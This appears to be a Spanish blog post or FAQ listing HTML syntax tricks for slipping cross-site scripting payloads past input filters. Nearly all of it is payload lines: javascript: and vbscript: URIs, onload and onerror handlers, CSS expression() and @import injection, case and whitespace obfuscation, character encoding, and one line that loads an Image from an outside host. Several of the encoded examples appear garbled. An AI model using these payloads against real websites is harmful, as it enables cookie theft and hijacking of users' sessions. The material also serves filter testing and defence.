Resgos principales de sintaxis HTML .FAQ por XSS en breve
by d4rk
Uno de los métodos más populares contra
ataques XSS es realización de distintos filtros en los símbolos introducidos
por el usuario. Pues abajo se citarán los rasgos caractéristicos del syntaxis html, que permiten pasar por los filtros mencionados.Cuando se trata de XSS vulnerabilidades, hay que admitir, que esa clase de vulnes son ¨Browser-Depended¨ , qué es eso?
Pues los ejemplos que se citan más abajo están
testeados en IE 6 y es muy posible que en otras versiones de navegador, o en
otro navegador no funcionen! Por ejemplo, símbolo de apóstrofo (`) en navegador de IE es de cierta forma limitador de los parámetros de IE, mientras que en navegador Opera, no lleva tal significado.
Divisor(Separador) de los párametros de tag
Además de espacio, podemos utilizar
símbolos: slash(/), tab,separador del línea . Divisor es posible trasladar, si
el atributo anterior es pondrá entre comillas.
<image/src="1.png"/alt="XD"/border="0">
<image src="1.png"
alt="XD" border="0">
<image
src="1.png"
alt=" xD"
border="0">
Limitadores del parametro tag
El significado es sposible poner entre
comillas (Doble y único) o apóstrofos. Pero también es posible no limitarlo
<image src="" alt="xD" border="0">
<image src="" alt='xD' border="0">
<image src="" alt=`xD` border="0">
<image src="" alt=xD border="0">
Codificación de símbolos
Decodificacion de simbolos en script se realiza antes de su ejecución.
<img src=javascript:alert("ok")>
<img src=javascript:alert('ok')>
<img
src=javascript:alert('ok')>
<a
href=javascript:alert(%22ok%22)>click me</a> (solamente parametro href)
Lmiitadores de simbolos literales en los scripts
<img src=javascript:alert('ok')>
<img src=javascript:alert("ok")>
<img src=javascript:a=/ok/;alert(a.source)>
<img src=javascript:alert(String.fromCharCode(111,107))>
Pasar por la filtración de ciertos símbolos:
<img
src=javascript:i=new/**/Image();i.src='http://bla.bla'>(cambio de espacio
por /**/)
Métodos de ejecución de script
Algunos métodos de auto ejecucion de script:
<script>alert('ok')</script>
<script src=1.js></script>
<body onLoad=alert('ok')>
<meta http-equiv=Refresh
content=0;url=javascript:alert('ok')>
<image src=1.png onload=alert('ok')>
<image src=javascript:alert('ok')>
<image src="" onerror=alert('ok')>
<hr style=background:url(javascript:alert('ok'))>
<span style=top:expression(alert('ok'))></span>
<span sss="alert();this.sss=null"
style=top:expression(eval(this.sss));></span> (<style type="text/css">@import
url(javascript:alert('ok'));</style>
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('ok')></object>
<embed src=javascript:alert('ok');this.avi>
<embed src=javascript:alert('ok');this.wav>
<iframe src=javascript:alert('ok')>
(solo en IE)
<a
href=javascript:alert(%22ok%22)>click me</a> (Ejecución solo al clicker en
vinculo)
<a
href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a>
(Ejecución solo al clicker en vinculo)
<br SIZE="&{alert('XSS')}"> (solamente
Netscape 4.x
Diferentes prótocolos de scripts y métodos de su creación :
<img src=javascript:alert()>
<img src=vbscript:AleRt()>
<img src=JaVasCriPt:alert()>
<img src=" javascript:alert()">
(esapcios hasta la palabra javascript)
<img src=javascript:alert()>
<img src=javascript :alert()>
<img src=javascript :alert()>
<img src=javascript :alert()>
<img src="javascript :alert()">
(antes de dos puntos – símbolo de Tab)
<img src="java scri
pt:ale rt()"> (dentreo de palabra
javascript – tan símbolo)
Las inserciones de los scripts en tag style
Los operadores del script en el atributo style es necesario dividir " \; ".
TAGS ESPECIALES
<hr style=`background:url(javascript:alert('ok
1')\;alert('ok 2'))`>
<image src="1.png" alt="" border="0">
(TAG IMG E IMAGE FUNCIONAN DE LA MISMA FORMA)
<plaintext> (TODO LO QUE QUE VENGA
DESPUES DE ESTE TAG USTED LO VERA COMO ,TEXTO NORMAL Y NO HTML)
<textarea> (TODO LO QUE QUE VENGA
DESPUES DE ESTE TAG USTED LO VERA COMO ,TEXTO NORMAL Y NO HTML)
<xml> (TODO LO QUE VENGA DESPUES DE
ESTE TAG, NO SE MOSTRARA)
Post a Comment